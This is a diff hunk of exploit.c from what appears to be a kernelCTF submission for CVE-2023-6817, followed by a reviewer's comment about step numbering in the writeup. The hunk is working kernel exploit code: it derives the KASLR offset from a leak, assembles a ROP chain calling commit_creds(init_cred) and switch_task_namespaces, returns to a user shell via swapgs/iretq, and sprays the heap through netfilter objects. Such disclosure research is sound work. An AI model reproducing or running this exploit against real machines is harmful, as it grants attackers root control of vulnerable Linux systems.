pocs/linux/kernelctf/CVE-2023-6817_lts_cos/exploit/cos-105-17412.226.28/exploit.c

```diff
@@ -0,0 +1,485 @@
+    nl_recvmsgs_default(socket2);
+    nl_recvmsgs_default(socket2);
+    printf("Leak end.\n");
+    printf("Start preparing ROP gadget in heap.\n");
+    kernel_off = leak_ops - 0xFFFFFFFF828C9FA0;
+    char *ops = malloc(0x100);
+    //ops->dump
+    *(uint64_t *)&ops[0x40] = kernel_off + 0xFFFFFFFF816B0D50;//leave ; ret
+    //ops->type
+    *(uint64_t *)&ops[0x70] = kernel_off + 0xFFFFFFFF835199E0;//last type
+    *(uint64_t *)&ops[0x08] = kernel_off + 0xFFFFFFFF810803E0;//pop rdi; ret
+    *(uint64_t *)&ops[0x10] = kernel_off + 0xFFFFFFFF83262140;//init_cred
+    *(uint64_t *)&ops[0x18] = kernel_off + 0xffffffff8110ced0;//commit_creds;
+    *(uint64_t *)&ops[0x20] = kernel_off + 0xffffffff81067153;//pop rdi ; pop r14 ; pop r13 ; pop r12 ; pop rbp ; pop rbx ; ret
+    *(uint64_t *)&ops[0x28] = 1;
+    *(uint64_t *)&ops[0x58] = kernel_off + 0xffffffff81103d40;//find_task_by_vpid
+    *(uint64_t *)&ops[0x60] = kernel_off + 0xffffffff8106715a;//pop rbp ; pop rbx ; ret   because ops->0x78 is the last_type
+    *(uint64_t *)&ops[0x78] = kernel_off + 0xffffffff8102c691;//mov rdi, rax ; mov eax, ebx ; pop rbx ; or rax, rdi ; ret
+    *(uint64_t *)&ops[0x80] = 0;
+    *(uint64_t *)&ops[0x88] = kernel_off + 0xffffffff813c146e;//pop rsi ; ret
+    *(uint64_t *)&ops[0x90] = kernel_off + 0xFFFFFFFF83261F00;//init_nsproxy
+    *(uint64_t *)&ops[0x98] = kernel_off + 0xffffffff8110b4f0;//switch_task_namespaces
+    *(uint64_t *)&ops[0xa0] = kernel_off + 0xFFFFFFFF81FE3BA7;//swapgs; ret
+    *(uint64_t *)&ops[0xa8] = kernel_off + 0xFFFFFFFF820011A7;//iretq
+    *(uint64_t *)&ops[0xb0] = (uint64_t)shell;
+    *(uint64_t *)&ops[0xb8] = user_cs;
+    *(uint64_t *)&ops[0xc0] = user_rflags;
+    *(uint64_t *)&ops[0xc8] = user_rsp|8;
+    *(uint64_t *)&ops[0xd0] = user_ss;
+    //free the last object.
+    for(i=0;i<0x40;i++){
+	if(i==0x20)
+		continue;
+        snprintf(obj_name,0x40,"obj_for_leak_%d",i);
+        del_obj(socket, table, obj_name, NFT_OBJECT_CT_EXPECT);
+    }
+    //heap spray to fill target heap
+    spray_tables(socket,0x800, ops, 0xe8);
+    printf("Finish prepare.\n");
+    target_heap = obj_a;
+    
+}
+
+
+void jmp_rop(struct nl_sock * socket){
+    char *pipapo_set = "set pipapo for rop";
+    char *hash_set_for_expr = "set hashtable for expr";
+    char *table = "table for rop";
+    char *target_chain = "chain for rop";
+    int i;
+    printf("start rop\n");
+    new_table(socket, table);
+    cur_handle = 0;
+    new_chain(socket, table, target_chain, 0);
+    
+    new_set_pipapo_for_poc_chain(socket, table, pipapo_set, 0x40);
+    new_set_hashtable_with_elemdata(socket, table, hash_set_for_expr, 0x30, 0x10);
+    //new_set_hashtable_for_poc_chain(socket, table, hash_set, 8);
+    //new_set_pipapo(socket,table, pipapo_set_for_expr, 0x38, NFT_OBJECT_CT_EXPECT);
+    nl_socket_modify_cb(socket,NL_CB_MSG_IN, NL_CB_CUSTOM, nl_callback_find_target_setelem, NULL);
+    
+    //step 1
```

Comment:
This seems to be the step 2 (not step 1) of the RIP part of the writeup. Can you fix that?